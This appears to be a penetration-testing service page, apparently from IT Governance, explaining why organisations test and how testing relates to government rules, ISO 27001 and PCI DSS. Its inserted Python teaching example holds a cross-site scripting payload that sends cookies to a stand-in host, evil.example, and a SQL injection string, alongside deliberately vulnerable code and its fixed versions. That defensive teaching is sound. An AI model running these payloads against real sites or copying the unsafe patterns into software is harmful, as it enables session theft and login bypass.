It’s not a question of if you will be attacked, but when.
What is penetration testing?
Effective penetration testing involves simulating a malicious attack on an organisation’s information security arrangements (either from malicious outsiders or its own staff), often using a combination of methods and tools.
The aim is to identify known vulnerabilities such as browser exploits, unpatched software, insecure coding practices and weak encryption algorithms. A penetration test should be conducted by a qualified, appropriately certified penetration tester, who will use their expertise to identify specific weaknesses within an organisation’s security arrangements rather than simply running an automated scanner.
Why conduct penetration testing?
Penetration tests are an important part of the process of identifying, measuring and communicating your cyber risks so that smart risk mitigation can be implemented. With the results of a successful pen test, you can show that the investments you are making have actual benefits that will support your organisation’s overall business objectives.
Threats are constantly evolving and changing:
More and more applications tunnel their traffic over HTTP or HTTPS (ports 80 and 443) by default, because those ports are almost always allowed through firewalls; port-based rules therefore say little about what is actually crossing the perimeter.
Malware can be downloaded automatically (a drive-by download) when a user simply visits a compromised or malicious page.
Websites can be compromised by code injection, cross-site scripting and similar black-hat hacking techniques.
Your website traffic can be hijacked.
Blacklisting by major search engines can cause you to lose business.
As the examples above show, new vulnerabilities are identified and exploited by criminal hackers quickly and easily. In many cases, you won’t even know that your defences have been breached until it’s too late. Even if you are a relatively unknown organisation of little apparent interest to an attacker, the criminals’ automated scans will find your presence online.
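As an added illustration of two of the website attacks listed above, injection and cross-site scripting, here is a small Python example written for this page (it is not code from IT Governance or from the original article). It puts a vulnerable handler next to its hardened form for each: an HTML comment renderer that concatenates untrusted input, and a login query built by string formatting. The user table, the payloads and the function names are constructed for the demonstration.

```python
import html
import sqlite3

# Constructed sample input: what an attacker might submit in a "display name" field.
XSS_PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
# Constructed sample input: a classic SQL injection string for a password field.
SQLI_PAYLOAD = "' OR '1'='1"


def render_comment_unsafe(name: str, body: str) -> str:
    """Vulnerable: untrusted input is concatenated straight into HTML (stored XSS)."""
    return f"<div class='comment'><b>{name}</b>: {body}</div>"


def render_comment_safe(name: str, body: str) -> str:
    """Hardened: HTML-escape every untrusted value before it reaches the page."""
    return f"<div class='comment'><b>{html.escape(name)}</b>: {html.escape(body)}</div>"


def make_demo_db() -> sqlite3.Connection:
    """In-memory SQLite table with two constructed users (hypothetical data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_unsafe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: the query is built by string formatting, so a quote in the
    input changes the query's logic. With SQLI_PAYLOAD as the password the
    WHERE clause becomes  ... AND password = '' OR '1'='1'  which is always true."""
    query = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: parameterised query; the input is bound as data and is never
    parsed as SQL, so the same payload simply fails to match any row."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    print("unsafe render :", render_comment_unsafe(XSS_PAYLOAD, "hello"))
    print("safe render   :", render_comment_safe(XSS_PAYLOAD, "hello"))
    db = make_demo_db()
    print("unsafe login with injection:", login_unsafe(db, "nobody", SQLI_PAYLOAD))
    print("safe login with injection  :", login_safe(db, "nobody", SQLI_PAYLOAD))
```

Running the script shows the unsafe renderer returning the script tag intact (it would execute in a visitor's browser) while the safe one returns it as text, and the unsafe login accepting a non-existent user with the injection payload while the parameterised version rejects it. These are exactly the kinds of findings a web application penetration test is meant to surface before an attacker does.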
Which test best suits my organisation?
Here at IT Governance, we present the vulnerabilities and risks to the organisation once the test has been conducted, along with recommendations for solutions, which are displayed as hard facts in a simple report designed to be easy to understand.
Our bespoke penetration tests deliver cost-effective and practical solutions that will help you meet your legal, regulatory and contractual requirements.
Regular vulnerability scanning and penetration testing should be a fundamental part of your monthly and quarterly security review process. These tests ensure that you identify and fix vulnerabilities and security holes as quickly as possible, and establish whether your cyber controls are working as effectively as they need to.
Read more below about penetration testing as a government requirement, and how it applies to the PCI DSS and ISO 27001.
Penetration testing as a government requirement
Under the government’s Security Policy Framework, all ICT systems that handle, store and process protectively marked information or business critical data must undergo a formal risk assessment to identify and understand relevant technical risks. They must also undergo a proportionate accreditation process to ensure that the risks to the confidentiality, integrity and availability of the data, system and/or service are properly managed. Penetration tests will be required in line with the mandatory technical risk assessments for all ICT systems or services. These assessments must be repeated annually or whenever there are significant changes to a risk component.
Public sector organisations must also ensure that their suppliers' security arrangements are appropriate for managing risks and responding effectively to any incidents. To comply with this requirement, public sector organisations must seek assurance from their suppliers that protective security and information risks are being managed to an appropriate level. In addition, the management of assurance activities must be independent of the organisation providing the service. The UK Government considers ISO 27001 to be best practice in managing information security risks, and in some instances ISO 27001 certification is a requirement of doing business with the government.
Penetration testing and ISO 27001
Penetration testing is an essential component of any ISO 27001-compliant information security management system (ISMS), from initial development to ongoing maintenance and continual improvement.
Control A.12.6.1 of ISO 27001:2013 specifies that “Information about technical vulnerabilities of information systems being used shall be obtained in a timely fashion, the organization's exposure to such vulnerabilities evaluated and appropriate measures be taken to address the associated risk.” (In the 2022 revision of the Standard the equivalent control is A.8.8, Management of technical vulnerabilities.) A vulnerability assessment or penetration test is the most direct way of identifying these vulnerabilities in systems, infrastructure and web applications.
There are three specific points in your ISMS project at which penetration testing can make a significant contribution:
As part of the risk assessment process: uncovering vulnerabilities in any Internet-facing IP addresses, web applications, or internal devices and applications, and linking them to identifiable threats.
As part of the risk treatment plan: ensuring that controls actually work as designed.
As part of the continual improvement process: ensuring that controls continue to work as required, and that new and emerging threats and vulnerabilities are identified and dealt with.
Penetration testing and the PCI DSS
Requirement 11 of the PCI DSS covers the need to regularly test security systems and processes: quarterly internal and external vulnerability scans (the external scans performed by an Approved Scanning Vendor), quarterly checks for rogue wireless access points, and penetration testing. The Standard states that penetration testing must be performed at least annually, as well as whenever there is a significant infrastructure or application upgrade or modification (for example, new system component installations, or the addition of a sub-network or web server), and that any exploitable vulnerabilities found must be corrected and the fix re-tested.
Why use IT Governance?
IT Governance Ltd is a CREST member company. This means that we have been verified as meeting the rigorous standards mandated by CREST. Clients can rest assured that IT Governance penetration tests will be carried out to the highest standards by qualified and knowledgeable individuals.
Book your test online, contact us directly by telephone on +44 (0)845 070 1750 or email us.